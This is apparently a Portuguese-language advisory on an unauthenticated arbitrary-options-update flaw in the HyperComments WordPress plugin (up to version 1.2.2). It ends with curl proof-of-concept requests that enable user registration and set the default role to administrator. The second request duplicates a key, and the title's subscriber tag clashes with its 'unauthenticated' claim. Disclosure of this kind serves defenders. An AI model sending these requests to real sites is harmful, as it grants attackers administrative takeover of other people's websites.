
HyperComments <= 1.2.2 - Atualização Arbitrária de Opções sem Autenticação (Assinante+)
HyperComments <= 1.2.2 - Atualização Arbitrária de Opções Não Autenticada (Assinante+)
O plugin HyperComments para WordPress é vulnerável a modificação não autorizada de dados que pode levar à escalada de privilégios devido a uma verificação de capacidade ausente na função hc_request_handler em todas as versões até, e incluindo, 1.2.2. Isso possibilita que atacantes não autenticados atualizem opções arbitrárias no site WordPress. Isso pode ser aproveitado para atualizar a função padrão de registro para administrador e habilitar o registro de usuários para que atacantes obtenham acesso administrativo a um site vulnerável.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"